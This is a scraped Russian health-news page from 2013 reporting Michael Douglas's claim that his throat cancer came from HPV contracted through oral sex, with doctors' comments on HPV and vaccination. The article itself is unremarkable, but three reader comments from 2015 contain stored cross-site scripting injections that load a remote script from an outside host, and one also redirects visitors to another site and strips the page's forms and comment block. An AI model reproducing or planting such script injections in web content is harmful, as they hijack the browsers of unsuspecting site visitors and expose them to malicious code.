Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Майкл Дуглас заболел рако...  >>  Майкл Дуглас заболел раком гортани из-за орального секса! Как дальше жить?
 
Обратная связь
 

Майкл Дуглас заболел раком гортани из-за орального секса! Как дальше жить?

Размер шрифта
10 июля 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

16 августа 2010 года – наверное, самый страшный день в жизни американского актера Майкла Дугласа. Именно в этот день у него обнаружили рак глотки.
Майкл Дуглас заболел раком гортани из-за орального секса! Как дальше жить?
Уже в июне 2013 года Майкл Дуглас заявил, что причиной развития рака стал оральный секс с сомнительными партнерами: «Не вдаваясь в подробности, скажу следующее: этот тип рака связан с вирусом папилломы человека (ВПЧ), которым я заразился через куннилингус», – утверждает Дуглас.

Он добавил, что его излечение – это настоящее чудо, потому как «рак глотки на такой стадии приводит к смерти в 95% случаев». Помимо прочего, Дуглас известен как заядлый курильщик и страстный любитель алкоголя. И то, и другое является фактором риска развития рака глотки. Эксперты полагают, что заявления Майкла Дугласа об оральном сексе вовсе не являются надуманными.

«Этот факт неудивителен для любого специалиста в области инфекционных заболеваний», – говорит доктор Марк Шигель, научный сотрудник Нью-Йоркского медицинского центра. «В последнее время мы наблюдаем всплеск опухолевых заболеваний, ассоциированных с вирусом папилломы. И рак глотки среди них – один из самых частых».

Шигель утверждает, что у большинства взрослых есть риск заразиться этим вирусом. Его обнаруживают у 80% людей, которые начали половую жизнь пять лет назад. ВПЧ является причиной огромного количества случаев рака шейки матки. В связи с этим в США дети вакцинируются от этого вируса.

С доктором Шигелем соглашаются и другие эксперты.

«Мы живем в век эпидемии ВПЧ», – говорит доктор Деннис Краус, директор клиники, специализирующейся на опухолях шеи и головы (Нью-Йорк). «Мы всегда считали, что рак глотки возникает вследствие курения и злоупотребления алкоголем, но демографическая ситуация изменилась, и сегодня эту болезнь вполне можно отнести к передаваемым половым путем».

Хорошие новости заключаются в том, что этот тип рака сравнительно хорошо лечится.

«Злокачественные опухоли глотки, не связанные с ВПЧ, куда чаще заканчиваются летальным исходом. Поэтому благополучный исход лечения Майкла Дугласа меня нисколько не удивляет», – говорит Шигель.

Пока нет четких данных об эффективность вакцины от ВПЧ в профилактике рака глотки. Тем не менее, многие специалисты уверены, что каждый подросток в возрасте 15 лет и старше должен быть вакцинирован. Важно, чтобы это случилось до начала сексуальной жизни.

«Нам еще предстоит доказать положительную роль вакцины от ВПЧ в борьбе с раком глотки», – с оптимизмом заявляет доктор Краус.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:12

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 19:31

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:11

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Обрезание после 35 лет предотвратит рак простаты! Осталось только найти желающих...   Муж не может долго заниматься сексом? Всего одна вещь решит вашу проблему!   Посмотрите на мужчин, которые вас окружают. Одинокие курильщики могут вызвать у вас рак!   Как быть здоровым ничего не делая  
09 июля 2013Майкл Дуглас заболел раком гортани из-за орального секса! Как дальше жить? 23 июля 2013Из лысых крыс сделают лекарство от рака
 
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 

Слайдшоу

1
Главные причины депрессии и как от них избавиться
Проблемы, с которыми справится секс. Часть 4
Лучшие позы для любых ситуаций

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.